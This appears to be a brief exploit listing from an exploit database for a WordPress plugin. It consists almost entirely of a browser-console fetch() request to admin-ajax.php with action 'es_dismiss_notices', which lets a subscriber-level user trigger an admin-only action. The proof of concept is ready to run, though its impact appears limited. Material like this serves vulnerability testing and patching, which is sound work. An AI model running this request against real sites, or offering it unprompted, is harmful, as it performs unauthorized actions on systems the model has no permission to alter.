Share
## https://sploitus.com/exploit?id=WPEX-ID:74CB07FE-FC82-472F-8C52-859C176D9E51
Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch("/wp-admin/admin-ajax.php?action=es_dismiss_notices", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "notice=template",
  "method": "POST",
});